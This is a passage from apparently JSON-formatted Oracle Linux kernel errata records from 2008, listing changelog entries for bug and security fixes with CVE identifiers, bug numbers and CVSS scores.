Sandeen) [202765]\n-udf: fix reservation discarding (Eric Sandeen) [202765]\n-nfs: Fix nfs read performance regression. Introduce a new tunable. (Larry Woodman) [396081]\n-nfs: High vm pagecache reclaim latency on systems with large highmem to lowmem ratio fix (Larry Woodman) [371191]\n-Do not mmap a page at address zero without MAP_FIXED (Vitaly Mayatskikh) [360281]\n[2.6.9-68.8.EL]\n-Fix unserialized task->files updation (Vitaly Mayatskikh) [250799]\n-nfs: fix redundant and incorrect protocol for nfs4 in /proc/mounts (Jeff Layton) [171712]\n-psmouse: Add support for cortps protocol (Aristeu Rozanski) [221467]\n-Potential deadlock in DM mirror code fix (Jonathan Brassow) [247879]\n-SIGKILL not respected under special circumstances fix (Michal Schmidt) [253665]\n-ide: Introduce command line option to disable ide drivers (Gerd Hoffmann) [270661]\n-networking: kernel oopses when multicasting with connection oriented socket (Anton Arapov) [250842]\n[2.6.9-68.7]\n-Fix possible NULL pointer dereference inside of strncmp() if of_get_property() failed (Vitaly Mayatskikh) [396811]\n-fix sys_waitid() hang (Jerome Marchand) [382191] {CVE-2007-5500}\n-dm mirror: fix pvmove causes kernel panic (Milan Broz) [179201]\n-fix possible filesystem corruption (Vitaly Mayatskikh) [428795] {CVE-2008-0001}\n[2.6.9-68.6]\n-add support for Realtek RTL8111/8168 PCI-Express NIC (Ivan Vecera) [251383]\n-ISDN: fix isdn_net_setcfg() vulnerability (Aristeu Rozanski) [392131] {CVE-2007-6063}\n-fix panic caused by set_mempolicy with MPOL_BIND (Vitaly Mayatskikh) [293211] {CVE-2007-4130}\n-fix core dump file permissions (Don Howard) [396981] {CVE-2007-6206}\n-I4L: fix isdn_ioctl memory issue (Vitaly Mayatskikh) [425161] {CVE-2007-6151}\n-fix dput after mntput bugs (Josef Bacik) [403361]\n-fix xenbus has use-after-free (Don Dutile) [249727]\n-acpiphp: Examine slots below P2P bridges (Prarit Bhargava) [415981]\n[2.6.9-68.5]\n-add tick divider capability (Chris Lalancette) [248488]\n[2.6.9-68.4]\n-do not call set_page_dirty_lock() on compound pages (Luming Yu) [248954 252400]\n-disables irqs in core sysrq code (Prarit Bhargava) [253573]\n-ipv6: fix inet6_dev refcnt leak (Neil Horman) [252222]\n-i386: ensure compressed diskdump header contains correct panic cpu (Dave Anderson) [309081]\n-fix up kabi for: enhance criteria for dead peer detection in ip_conntrack (Neil Horman)\n[2.6.9-68.3]\n-enhance criteria for dead peer detection in ip_conntrack (Neil Horman) [205966]\n-i386/x86_64 segment register access update (Peter Zijlstra) [414251]\n-Remove duplicated FAKE_STACK_FRAME macro (Peter Zijlstra) [414261]\n-add new CIFS Kconfig options (Jeff Layton) [282591]\n-dm: fix bd_mount_sem counter corruption (Milan Broz) [377351]\n-dm: fix panic on shrinking device size (Milan Broz) [360311]\n-dm crypt: fix oops on device removal (Milan Broz) [377371]\n[2.6.9-68.2]\n-add missing dput() in do_lookup() error case (Eric Sandeen) [363471]\n-fix diskdump performance regression on mpt fustion driver (Takao Indoh) [284991]\n-add missing pskb_may_pull in icmp_filter (Jerome Marchand) [356501]\n-Fix incorrect logic in AMD NMI code (Prarit Bhargava) [387451]\n-Get rid of Tuxs O_ATOMICLOOKUP (Michal Schmidt) [358681]\n-lcs: After channel failure do not drive normal shutdown sequence (Hans-Joachim Picht) [354141]\n[2.6.9-68.1]\n-add back: eliminate excessive latency when writing to a large file\n-add back: setting better values for dirty limits\n-serial: assert DTR for serial console devices (Michal Schmidt) [244248]\n-bonding: only do ipv6 addrconf on master bond devices (Vince Worthington) [249631]\n-lsm: reduce noise during security_register (Ivan Vecera) [249404]\n-selinux: quiet complaints when using OpenAFS (Eric Paris) [239628]\n-Fix for NFS attribute timeout handling (Fabio Leite) [247905]\n-tty: set pending_signal() when returning -ERESTARTSYS (Aristeu Rozanski) [245343]\n-ieee80211 off-by-two integer underflow (Anton Arapov) [346381] {CVE-2007-4997}\n-fix bad schedule_timeout() call causing excessive delay (Jonathan Brassow) [381081]\n-do not return zero in mmap (Rik van Riel) [360281]\n[2.6.9-68]\n-revert: eliminate excessive latency when writing to a large file\n-revert: setting better values for dirty limits", "edition": 72, "modified": "2008-08-01T00:00:00", "published": "2008-08-01T00:00:00", "id": "ELSA-2008-0665", "href": "http://linux.oracle.com/errata/ELSA-2008-0665.html", "title": "Updated kernel packages for Oracle Enterprise Linux 4.7", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:11", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2136", "CVE-2008-3525", "CVE-2008-2729", "CVE-2008-4210", "CVE-2008-3275", "CVE-2007-6063", "CVE-2008-2812", "CVE-2008-1673"], "description": "[2.4.21-58.0.0.0.1.EL]\n- add directio support for qla drivers (herb) [ora 6346849]\n- support PT Quad card [ora 5751043]\n- io to nfs partition hangs [ora 5088963]\n- add entropy for bnx2 nic [ora 5931647]\n- avoid large allocation-fragmentation in MTU (zab)\n- fix clear highpage (wli)\n[2.4.21-58.EL]\n- copy_user doesn't zero tail bytes on page fault (Don Howard) [433941] {CVE-2008-2729}\n- Fix long symlink support (Fabio Olive Leite) [BZ 438758]\n- Fix possible buffer overflow in ASN.1 parsing routine (Don Howard) [444461] {CVE-2008-1673}\n- Fix exploitable remote memory leak in sit (Don Howard) [446034] {CVE-2008-2136}\n- Fix possible panic in mptctl_gettargetinfo (Don Howard) [451955]\n- Add add NULL pointer checks in tty drivers (Don Howard) [453158] {CVE-2008-2812}\n- Add a kernel parameter to disable lost tick accounting on x86_64 (Don Howard) [455921]\n- Fix possible isdn_net buffer overflows (Don Howard) [456361] {CVE-2007-6063}\n- Fix lookup on deleted directory (Eugene Teo) [457862] {CVE-2008-3275}\n- Add missing capability checks in sbni_ioctl (Eugene Teo) [460404] {CVE-2008-3525}\n- Remove suid/sgid bits on ftruncate (dhoward) [463684] {CVE-2008-4210}", "edition": 4, "modified": "2008-12-18T00:00:00", "published": "2008-12-18T00:00:00", "id": "ELSA-2008-0973", "href": "http://linux.oracle.com/errata/ELSA-2008-0973.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:42", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4554", "CVE-2007-6417", "CVE-2008-3272", "CVE-2008-5029", "CVE-2008-0598", "CVE-2008-3496", "CVE-2008-3831", "CVE-2007-5907", "CVE-2008-2372", "CVE-2008-3527", "CVE-2008-5182", "CVE-2008-5079", "CVE-2006-5755", "CVE-2008-2729", "CVE-2008-4576", "CVE-2008-5300", "CVE-2008-3276", "CVE-2008-2358", "CVE-2008-4210", "CVE-2008-3275", "CVE-2008-1673"], "description": "[2.6.18-128.el5]\n- [cifs] cifs_writepages may skip unwritten pages (Jeff Layton ) [470267]\n[2.6.18-127.el5]\n- Revert: [i386]: check for dmi_data in powernow_k8 driver (Prarit Bhargava ) [476184]\n- [xen] re-enable using xenpv in boot path for FV guests (Don Dutile ) [473899]\n- [xen] pv_hvm: guest hang on FV save/restore (Don Dutile ) [475778]\n- [openib] fix ipoib oops in unicast_arp_send (Doug Ledford ) [476005]\n- [scsi] fnic: remove link down count processing (mchristi@redhat.com ) [474935]\n- Revert: [x86] disable hpet on machine_crash_shutdown (Neil Horman ) [475652]\n- [scsi] ibmvscsi: EH fails due to insufficient resources (AMEET M. PARANJAPE ) [475618]\n- [x86_64] proc: export GART region through /proc/iomem (Neil Horman ) [475507]\n- [acpi] add xw8600 and xw6600 to GPE0 block blacklist (Prarit Bhargava ) [475418]\n- [net] cxgb3: fixup embedded firmware problems take 2 (Andy Gospodarek ) [469774]\n[2.6.18-126.el5]\n- [scsi] mpt fusion: disable msi by default (Tomas Henzl ) [474465]\n- [scsi] fcoe: update drivers (mchristi@redhat.com ) [474089]\n- [scsi] fix error handler to call scsi_decide_disposition (Tom Coughlan ) [474345]\n- [scsi] lpfc: fix cancel_retry_delay (Tom Coughlan ) [470610]\n- [x86] disable hpet on machine_crash_shutdown (Neil Horman ) [473038]\n- Revert [mm] keep pagefault from happening under pagelock (Don Zickus ) [473150]\n- [net] enic: update to version 1.0.0.648 (Andy Gospodarek ) [473871]\n- [scsi] qla4xxx: increase iscsi session check to 3-tuple (Marcus Barrow ) [474736]\n- [agp] update the names of some graphics drivers (John Villalovos ) [472438]\n- [net] atm: prevent local denial of service (Eugene Teo ) [473701] {CVE-2008-5079}\n- [scsi] remove scsi_dh_alua (mchristi@redhat.com ) [471920]\n- [scsi] qla2xx/qla84xx: occasional panic on loading (Marcus Barrow ) [472382]\n- [net] cxgb3: eeh and eeprom fixups (Andy Gospodarek ) [441959]\n- [net] cxgb3: fixup embedded firmware problems (Andy Gospodarek ) [469774]\n- [wireless] iwlwifi/mac80211: various small fixes (John W. Linville ) [468967]\n- [x86_64] fix AMD IOMMU boot issue (Joachim Deguara ) [473464]\n- [x86_64] limit num of mce sysfs files removed on suspend (Prarit Bhargava ) [467725]\n- [xen] console: make LUKS passphrase readable (Bill Burns ) [466240]\n- [x86_64] Calgary IOMMU sysdata fixes (Prarit Bhargava ) [474047]\n- [alsa] select 3stack-dig model for SC CELSIUS R670 (Jaroslav Kysela ) [470449]\n- [ata] libata: lba_28_ok sector off by one (David Milburn ) [464868]\n- [ppc64] fix system calls on Cell entered with XER.SO=1 (Jesse Larrew ) [474196]\n- [block] fix max_segment_size, seg_boundary mask setting (Milan Broz ) [471639]\n- [fs] jbd: alter EIO test to avoid spurious jbd aborts (Eric Sandeen ) [472276]\n- [acpi] acpi_cpufreq: fix panic when removing module (Prarit Bhargava ) [472844]\n- [openib] ehca: fix generating flush work completions (AMEET M. PARANJAPE ) [472812]\n- [ata] libata: sata_nv hard reset mcp55 (David Milburn ) [473152]\n- [misc] fix add return signal to ptrace_report_exec (AMEET M. PARANJAPE ) [471112]\n- [misc] utrace: prevent ptrace_induce_signal() crash (Oleg Nesterov ) [469754]\n- [misc] utrace: make ptrace_state refcountable (Oleg Nesterov ) [469754]\n- [net] virtio_net: mergeable receive buffers (Mark McLoughlin ) [473120]\n- [net] virtio_net: jumbo frame support (Mark McLoughlin ) [473114]\n- [net] tun: jumbo frame support (Mark McLoughlin ) [473110]\n- [net] fix unix sockets kernel panic (Neil Horman ) [470436] {CVE-2008-5029}\n- [xen] x86: emulate movzwl with negative segment offsets (Chris Lalancette ) [471801]\n[2.6.18-125.el5]\n- [net] cxgb3: embed firmware in driver (Andy Gospodarek ) [469774]\n- [net] cxgb3: eeh, lro, and multiqueue fixes (Andy Gospodarek ) [441959]\n- [misc] support for Intels Ibex Peak (peterm@redhat.com ) [472961]\n- [audit] race between inotify watch removal and unmount (Josef Bacik ) [472329] {CVE-2008-5182}\n- [net] mlx4: panic when inducing pci bus error (AMEET M. PARANJAPE ) [472769]\n- [s390] cio: DASD device driver times out (Hans-Joachim Picht ) [459803]\n- [misc] hugepages: ia64 stack overflow and corrupt memory (Larry Woodman ) [472802]\n- [net] niu: fix obscure 64-bit read issue (Andy Gospodarek ) [472849]\n- [x86] nmi_watchdog: call do_nmi_callback from traps-xen (Aristeu Rozanski ) [471111]\n- [GFS2] recovery stuck (Abhijith Das ) [465856]\n- [misc] fix check_dead_utrace vs do_wait() race (Oleg Nesterov ) [466774]\n- [scsi] cciss: add two new PCI IDs (Tom Coughlan ) [471679]\n- [x86] fix memory-less NUMA node booting (Prarit Bhargava ) [471424]\n- [pci] generic fix for EEH restore all registers (Jesse Larrew ) [470580]\n- [net] e1000e: remove fix for EEH restore all registers (Jesse Larrew ) [470580]\n- [agp] use contiguous memory to support xen (Rik van Riel ) [412691]\n- [edac] i5000_edac: fix misc/thermal error messages (Aristeu Rozanski ) [471933]\n- [alsa] fix PCM write blocking (Jaroslav Kysela ) [468202]\n- [xen] build xen-platform-pci as a module (Don Dutile ) [472504]\n- [scsi] qla2xx/qla84xx: failure to establish link (Marcus Barrow ) [472382]\n- [acpi] add systems to GPE register blacklist (Prarit Bhargava ) [471341]\n- [ia64] replace printk with mprintk in MCA/INIT context (Kei Tokunaga ) [471970]\n- [usb] add support for dell keyboard 431c:2003 (Mauro Carvalho Chehab ) [471469]\n- [net] e1000e: enable ECC correction on 82571 silicon (Andy Gospodarek ) [472095]\n- [dlm] fix up memory allocation flags (David Teigland ) [471871]\n- [xen] x86: fix highmem-xen.c BUG() (Chris Lalancette ) [452175]\n- [xen] guest crashes if RTL8139 NIC is only one specified (Don Dutile ) [471110]\n- [net] bnx2: fix oops on call to poll_controller (Neil Horman ) [470625]\n- [scsi] update fcoe drivers (mchristi@redhat.com ) [436051]\n- [net] bnx2: add support for 5716s (Andy Gospodarek ) [471903]\n- [openib] IPoIB: fix oops on fabric events (Doug Ledford ) [471890]\n- [libata] force sb600/700 ide mode into ahci on resume (David Milburn ) [466422]\n- [xen] increase maximum DMA buffer size (Rik van Riel ) [412691]\n- [xen] fix physical memory address overflow (Rik van Riel ) [412691]\n[2.6.18-124.el5]\n- [s390] qeth: EDDP for large TSO skb fragment list (Hans-Joachim Picht ) [468068]\n- [s390] missing bits for audit-fork (Alexander Viro ) [461831]\n- [net] ixgbe: add support for 82598AT (Andy Gospodarek ) [454910]\n- [libata] avoid overflow in ata_tf_read_block (David Milburn ) [471576]\n- [md] dm-mpath: NULL ptr access in path activation code (Milan Broz ) [471393]\n- [scsi] qla2xxx: no NPIV for loop connections (Marcus Barrow ) [471269]\n- [ppc64] spufs: clean up page fault error checking (AMEET M. PARANJAPE ) [470301]\n- [fs] cifs: corrupt data due to interleaved write calls (Jeff Layton ) [470267]\n- [misc] lots of interrupts with /proc/.../hz_timer=0 (Hans-Joachim Picht ) [470289]\n- [selinux] recognize addrlabel netlink messages (Thomas Graf ) [446063]\n- [acpi] thinkpad: fix autoloading (Matthew Garrett ) [466816]\n- [net] bnx2x: eeh, unload, probe, and endian fixes (Andy Gospodarek ) [468922]\n- [firewire] various bug and module unload hang fixes (Jay Fenlason ) [469710 469711]\n[2.6.18-123.el5]\n- [s390] cio: reduce cpu utilization during device scan (Hans-Joachim Picht ) [459793]\n- [s390] cio: fix double unregistering of subchannels (Hans-Joachim Picht ) [456087]\n- [video] uvc: buf overflow in format descriptor parsing (Jay Fenlason ) [470427] {CVE-2008-3496}\n- [usb] add HID_QUIRK_RESET_LEDS to some keyboards (mchehab@infradead.org ) [434538]\n- [acpi] always use 32 bit value for GPE0 on HP xw boxes (Prarit Bhargava ) [456638]\n- [wireless] iwlagn/mac80211 IBSS fixes (John W. Linville ) [438388]\n- [ppc64] cell: fix page fault error checking in spufs (AMEET M. PARANJAPE ) [470301]\n- [input] atkbd: cancel delayed work before freeing struct (Jiri Pirko ) [461233]\n- [openib] ehca: deadlock race when creating small queues (Jesse Larrew ) [470137]\n- [openib] mthca: fix dma mapping leak (AMEET M. PARANJAPE ) [469902]\n- [openib] ib_core: use weak ordering for user memory (AMEET M. PARANJAPE ) [469902]\n- [ppc64] dma-mapping: provide attributes on cell platform (AMEET M. PARANJAPE ) [469902]\n- [net] bnx2: prevent ethtool -r EEH event (AMEET M. PARANJAPE ) [469962]\n- [net] bonding: update docs for arp_ip_target behavior (Andy Gospodarek ) [468870]\n- [xen] uninitialized watch structure can lead to crashes (Don Dutile ) [465849]\n- [openib] ehca: remove ref to QP if port activation fails (AMEET M. PARANJAPE ) [469941]\n- [usb] fix locking for input devices (James Paradis ) [468915]\n- [nfs] oops in direct I/O error handling (Steve Dickson ) [466164]\n- [md] crash in device mapper if the user removes snapshot (Mikulas Patocka ) [468473]\n- [openib] config update: enable some debugging (Doug Ledford ) [469410]\n- [sata] libata is broken with large disks (David Milburn ) [469715]\n- [md] dm-raid1: support extended status output (Jonathan Brassow ) [437177]\n- [s390] qdio: repair timeout handling for qdio_shutdown (Hans-Joachim Picht ) [463164]\n- [openib] race in ipoib_cm_post_receive_nonsrq (AMEET M. PARANJAPE ) [463485]\n- [xen] remove contiguous_bitmap (Chris Lalancette ) [463500]\n- [xen] ia64: backport check_pages_physically_contiguous (Chris Lalancette ) [463500]\n- [ppc64] cell: corrupt SPU coredump notes (AMEET M. PARANJAPE ) [431881]\n- [ppc64] spufs: missing context switch notification log-2 (AMEET M. PARANJAPE ) [462622]\n- [ppc64] spufs: missing context switch notification log-1 (AMEET M. PARANJAPE ) [462622]\n- [misc] spec: add generic Obsoletes for 3rd party drivers (Jon Masters ) [460047]\n- [x86] vDSO: use install_special_mapping (Peter Zijlstra ) [460276] {CVE-2008-3527}\n- [xen] limit node poking to available nodes (Joachim Deguara ) [449803]\n- [xen] live migration of PV guest fails (Don Dutile ) [469230]\n[2.6.18-122.el5]\n- [acpi] check common dmi tables on systems with acpi (Andy Gospodarek ) [469444]\n- [scsi] qla3xxx, qla4xxx: update/use new version format (Marcus Barrow ) [469414]\n- [md] dm-stripe.c: RAID0 event handling (Heinz Mauelshagen ) [437173]\n- [md] dm-raid45.c: add target to makefile (Heinz Mauelshagen ) [437180]\n- [md] dm-raid45.c: revert to RHEL5 dm-io kabi (Heinz Mauelshagen ) [437180]\n- [wireless] iwlwifi: avoid sleep in softirq context (John W. Linville ) [467831]\n- [net] bonding: allow downed interface before mod remove (Andy Gospodarek ) [467244]\n- [acpi] fix boot hang on old systems without _CST methods (Matthew Garrett ) [467927]\n- [scsi] qla2xxx: fix entries in class_device_attributes (Marcus Barrow ) [468873]\n- [ppc64] clock_gettime is not incrementing nanoseconds (AMEET M. PARANJAPE ) [469073]\n- [scsi] add fnic driver (mchristi@redhat.com ) [462385]\n- [scsi] add libfc and software fcoe driver (mchristi@redhat.com ) [436051]\n- [openib] ppc64: fix using SDP on 64K page systems (AMEET M. PARANJAPE ) [468872]\n- [fs] ext4: delay capable checks to avoid avc denials (Eric Sandeen ) [467216]\n- [fs] ext3: fix accessing freed memory in ext3_abort (Eric Sandeen ) [468547]\n- [fs] autofs4: correct offset mount expire check (Ian Kent ) [468187]\n- [fs] autofs4: cleanup autofs mount type usage (Ian Kent ) [468187]\n- [openib] ehca: queue and completion pair setup problem (AMEET M. PARANJAPE ) [468237]\n- [xen] PV: dom0 hang when device re-attached to in guest (Don Dutile ) [467773]\n- [scsi] qla2xxx: correct Atmel flash-part handling (Marcus Barrow ) [468573]\n- [scsi] qla2xxx: 84xx show FW VER and netlink code fixes (Marcus Barrow ) [464681]\n- [scsi] qla2xxx: restore disable by default of MSI, MSI-X (Marcus Barrow ) [468555]\n- [scsi] lpfc: Emulex RHEL-5.3 bugfixes (Tom Coughlan ) [461795]\n- [s390] qdio: speedup multicast on full HiperSocket queue (Hans-Joachim Picht ) [463162]\n- [ppc64] kexec/kdump: disable ptcal on QS21 (AMEET M. PARANJAPE ) [462744]\n- [ppc64] ptcal has to be disabled to use kexec on QS21 (AMEET M. PARANJAPE ) [462744]\n- [net] ixgbe: bring up device without crashing fix (AMEET M. PARANJAPE ) [467777]\n- [fs] ecryptfs: storing crypto info in xattr corrupts mem (Eric Sandeen ) [468192]\n- [misc] rtc: disable SIGIO notification on close (Vitaly Mayatskikh ) [465747]\n- [net] allow rcv on inactive slaves if listener exists (Andy Gospodarek ) [448144]\n- [net] e1000e: update driver to support recovery (AMEET M. PARANJAPE ) [445299]\n- [xen] virtio_net: some relatively minor fixes (Mark McLoughlin ) [468034]\n- [kabi] add dlm_posix_set_fsid (Jon Masters ) [468538]\n- [wireless] iwlwifi: fix busted tkip encryption _again_ (John W. Linville ) [467831]\n- [x86] make halt -f command work correctly (Ivan Vecera ) [413921]\n- [ppc64] EEH PCI-E: recovery fails E1000; support MSI (AMEET M. PARANJAPE ) [445299]\n- [x86_64] create a fallback for IBM Calgary (Pete Zaitcev ) [453680]\n- [drm] i915 driver arbitrary ioremap (Eugene Teo ) [464509] {CVE-2008-3831}\n- [xen] x86: allow the kernel to boot on pre-64 bit hw (Chris Lalancette ) [468083]\n[2.6.18-121.el5]\n- [net] tun: fix printk warning (Mark McLoughlin ) [468536]\n- [xen] FV: fix lockdep warnings when running debug kernel (Don Dutile ) [459876]\n- [xen] fix crash on IRQ exhaustion (Bill Burns ) [442736]\n- [net] ipv4: fix byte value boundary check (Jiri Pirko ) [468148]\n- [ia64] fix ptrace hangs when following threads (Denys Vlasenko ) [461456]\n- [net] tcp: let skbs grow over a page on fast peers (Mark McLoughlin ) [467845]\n- [md] random memory corruption in snapshots (Mikulas Patocka ) [465825]\n- [misc] ptrace: fix exec report (Jerome Marchand ) [455060]\n- [gfs2] set gfp for data mappings to GFP_NOFS (Steven Whitehouse ) [467689]\n- [nfs] remove recoverable BUG_ON (Steve Dickson ) [458774]\n- [openib] ehca: attempt to free srq when none exists (AMEET M. PARANJAPE ) [463487]\n- [fs] dont allow splice to files opened with O_APPEND (Eugene Teo ) [466710] {CVE-2008-4554}\n- [fs] ext4: add missing aops (Eric Sandeen ) [466246]\n- [ppc64] add missing symbols to vmcoreinfo (Neil Horman ) [465396]\n- [net] sctp: INIT-ACK indicates no AUTH peer support oops (Eugene Teo ) [466082] {CVE-2008-4576}\n- [ppc64] fix race for a free SPU (AMEET M. PARANJAPE ) [465581]\n- [ppc64] SPUs hang when run with affinity-2 (AMEET M. PARANJAPE ) [464686]\n- [ppc64] SPUs hang when run with affinity-1 (AMEET M. PARANJAPE ) [464686]\n- [openib] ehca: add flush CQE generation (AMEET M. PARANJAPE ) [462619]\n- [x86] PAE: limit RAM to 64GB/PAE36 (Larry Woodman ) [465373]\n- [nfs] portmap client race (Steve Dickson ) [462332]\n- [input] atkbd: delay executing of LED switching request (Jiri Pirko ) [461233]\n- [x86] powernow_k8: depend on newer version of cpuspeed (Brian Maly ) [468764]\n- [fs] ext4: fix warning on x86_64 build (Eric Sandeen ) [463277]\n- [crypto] fix ipsec crash with MAC longer than 16 bytes (Neil Horman ) [459812]\n- [fs] ecryptfs: depend on newer version of ecryptfs-utils (Eric Sandeen ) [468772]\n- [ppc64] support O_NONBLOCK in /proc/ppc64/rtas/error_log (Vitaly Mayatskikh ) [376831]\n- [xen] ia64: make viosapic SMP-safe by adding lock/unlock (Tetsu Yamamoto ) [466552]\n- [xen] ia64: VT-i2 performance restoration (Bill Burns ) [467487]\n[2.6.18-120.el5]\n- [misc] futex: fixup futex compat for private futexes (Peter Zijlstra ) [467459]\n- [pci] set domain/node to 0 in PCI BIOS enum code path (Prarit Bhargava ) [463418]\n- [scsi] qla2xxx: prevent NPIV conf for older hbas (Marcus Barrow ) [467153]\n- [scsi] fix oops after trying to removing rport twice (Marcus Barrow ) [465945]\n- [agp] re-introduce 82G965 graphics support (Prarit Bhargava ) [466307]\n- [agp] correct bug in stolen size calculations (Dave Airlie ) [463853]\n- [scsi] qla2xxx: merge errors caused initialize failures (Marcus Barrow ) [442946]\n- [dm] mpath: moving path activation to workqueue panics (Milan Broz ) [465570]\n- [scsi] aacraid: remove some quirk AAC_QUIRK_SCSI_32 bits (Tomas Henzl ) [453472]\n- Revert: [ppc64] compile and include the addnote binary (Don Zickus ) [462663]\n- [scsi] cciss: the output of LUN size and type wrong (Tomas Henzl ) [466030]\n- [misc] posix-timers: event vs dequeue_signal() race (Mark McLoughlin ) [466167]\n- [ata] libata: ahci enclosure management support (David Milburn ) [437190]\n- [gfs2] fix jdata page invalidation (Steven Whitehouse ) [437803]\n- [net] sky2: fix hang resulting from link flap (Neil Horman ) [461681]\n- [ata] libata: ata_piix sata/ide combined mode fix (David Milburn ) [463716]\n- [gfs2] fix for noatime support (Steven Whitehouse ) [462579]\n- [fs] remove SUID when splicing into an inode (Eric Sandeen ) [464452]\n- [fs] open() allows setgid bit when user is not in group (Eugene Teo ) [463687] {CVE-2008-4210}\n- [dlm] add old plock interface (David Teigland ) [462354]\n- [audit] fix NUL handling in TTY input auditing (Miloslav Trmac ) [462441]\n- [xen] ia64: fix INIT injection (Tetsu Yamamoto ) [464445]\n[2.6.18-119.el5]\n- [ppc64] compile and include the addnote binary (Don Zickus ) [462663]\n- [scsi] qla2xxx: new version string defintion (Marcus Barrow ) [465023]\n- [acpi] configs update for acpi-cpufreq driver (Matthew Garrett ) [449787]\n[2.6.18-118.el5]\n- [scsi] fix QUEUE_FULL retry handling (mchristi@redhat.com ) [463709]\n- [drm] support for Intel Cantiga and Eaglelake (Dave Airlie ) [438400]\n- [agp] add support for Intel Cantiga and Eaglelake (Dave Airlie ) [463853]\n- Revert: [mm] fix support for fast get user pages (Dave Airlie ) [447649]\n- [ppc64] netboot image too large (Ameet Paranjape ) [462663]\n- [scsi] scsi_error: retry cmd handling of transport error (mchristi@redhat.com ) [463206]\n- [net] correct mode setting for extended sysctl interface (Neil Horman ) [463659]\n- [net] e1000e: protect ICHx NVM from malicious write/erase (Andy Gospodarek ) [463503]\n- [s390] qdio: fix module ref counting in qdio_free (Hans-Joachim Picht ) [458074]\n- [scsi] qla2xxx: use the NPIV table to instantiate port (Marcus Barrow ) [459015]\n- [scsi] qla2xxx: use the Flash Layout Table (Marcus Barrow ) [459015]\n- [scsi] qla2xxx: use the Flash Descriptor Table (Marcus Barrow ) [459015]\n- [net] enic: add new 10GbE device (Andy Gospodarek ) [462386]\n- [net] ipt_CLUSTERIP: fix imbalanced ref count (Neil Horman ) [382491]\n- [scsi] qla2xxx: update 24xx,25xx firmware for RHEL-5.3 (Marcus Barrow ) [442946]\n- [net] bnx2: fix problems with multiqueue receive (Andy Gospodarek ) [441964]\n- [net] e1000: add module param to set tx descriptor power (Andy Gospodarek ) [436966]\n- [misc] preempt-notifier fixes (Eduardo Habkost ) [459838]\n- [tty] termiox support missing mutex lock (aris ) [445211]\n- [fs] ecryptfs: off-by-one writing null to end of string (Eric Sandeen ) [463478]\n- [misc] add tracepoints to activate/deactivate_task (Jason Baron ) [461966]\n- [scsi] qla2xxx: use rport dev loss timeout consistently (Marcus Barrow ) [462109]\n- [ata] libata: rmmod pata_sil680 hangs (David Milburn ) [462743]\n- [scsi] qla2xxx: support PCI Enhanced Error Recovery (Marcus Barrow ) [462416]\n- [ppc64] subpage protection for pAVE (Brad Peters ) [439489]\n- [ppc64] edac: enable for cell platform (Brad Peters ) [439507]\n[2.6.18-117.el5]\n- [mm] filemap: fix iov_base data corruption (Josef Bacik ) [463134]\n- Revert: [misc] create a kernel checksum file per FIPS140-2 (Don Zickus ) [444632]\n- [x86_64] NMI wd: clear perf counter registers on P4 (Aristeu Rozanski ) [461671]\n- [scsi] failfast bit setting in dm-multipath/multipath (mchristi@redhat.com ) [463470]\n- [scsi] fix hang introduced by failfast changes (Mark McLoughlin ) [463416]\n- [x86_64] revert time syscall changes (Prarit Bhargava ) [461184]\n[2.6.18-116.el5]\n- [x86] mm: fix endless page faults in mount_block_root (Larry Woodman ) [455491]\n- [mm] check physical address range in ioremap (Larry Woodman ) [455478]\n- [scsi] modify failfast so it does not always fail fast (mchristi@redhat.com ) [447586]\n- Revert: [mm] NUMA: system is slow when over-committing memory (Larry Woodman ) [457264]\n- [docs] update kernel-parameters with tick-divider (Chris Lalancette ) [454792]\n- [openib] add an enum for future RDS support (Doug Ledford ) [462551]\n- [pci] allow multiple calls to pcim_enable_device (John Feeney ) [462500]\n- [xen] virtio: include headers in kernel-headers package (Eduardo Pereira Habkost ) [446214]\n- [scsi] libiscsi: data corruption when resending packets (mchristi@redhat.com ) [460158]\n- [gfs2] glock deadlock in page fault path (Bob Peterson ) [458684]\n- [gfs2] panic if you misspell any mount options (Abhijith Das ) [231369]\n- [xen] allow guests to hide the TSC from applications (Chris Lalancette ) [378481] {CVE-2007-5907}\n[2.6.18-115.el5]\n- [scsi] qla2xxx: additional residual-count correction (Marcus Barrow ) [462117]\n- [audit] audit-fork patch (Alexander Viro ) [461831]\n- [net] ipv6: extra sysctls for additional TAHI tests (Neil Horman ) [458270]\n- [nfs] disable the fsc mount option (Steve Dickson ) [447474]\n- [acpi] correctly allow WoL from S4 state (Neil Horman ) [445890]\n- [ia64] procfs: show the size of page table cache (Takao Indoh ) [458410]\n- [ia64] procfs: reduce the size of page table cache (Takao Indoh ) [458410]\n- [fs] ecryptfs: disallow mounts on nfs, cifs, ecryptfs (Eric Sandeen ) [435115]\n- [md] add device-mapper message parser interface (heinzm@redhat.com ) [437180]\n- [md] add device-mapper RAID4/5 stripe locking interface (heinzm@redhat.com ) [437180]\n- [md] add device-mapper dirty region hash file (heinzm@redhat.com ) [437180]\n- [md] add device-mapper object memory cache interface (heinzm@redhat.com ) [437180]\n- [md] add device-mapper object memory cache (heinzm@redhat.com ) [437180]\n- [md] export dm_disk and dm_put (heinzm@redhat.com ) [437180]\n- [md] add device-mapper RAID4/5 target (heinzm@redhat.com ) [437180]\n- [md] add device-mapper message parser (heinzm@redhat.com ) [437180]\n- [md] add device mapper dirty region hash (heinzm@redhat.com ) [437180]\n- [md] add config option for dm RAID4/5 target (heinzm@redhat.com ) [437180]\n- [scsi] qla2xxx: update 8.02.00-k5 to 8.02.00-k6 (Marcus Barrow ) [459722]\n- [kabi] add vscnprintf, down_write_trylock to whitelist (Jon Masters ) [425341]\n- [kabi] add dlm_posix_get/lock/unlock to whitelist (Jon Masters ) [456169]\n- [kabi] add mtrr_add and mtrr_del to whitelist (Jon Masters ) [437129]\n- [kabi] add iounmap to whitelist (Jon Masters ) [435144]\n- [x86] make powernow_k8 a module (Brian Maly ) [438835]\n- [fs] ecryptfs: delay lower file opens until needed (Eric Sandeen ) [429142]\n- [fs] ecryptfs: unaligned access helpers (Eric Sandeen ) [457143]\n- [fs] ecryptfs: string copy cleanup (Eric Sandeen ) [457143]\n- [fs] ecryptfs: discard ecryptfsd registration messages (Eric Sandeen ) [457143]\n- [fs] ecryptfs: privileged kthread for lower file opens (Eric Sandeen ) [457143]\n- [fs] ecryptfs: propagate 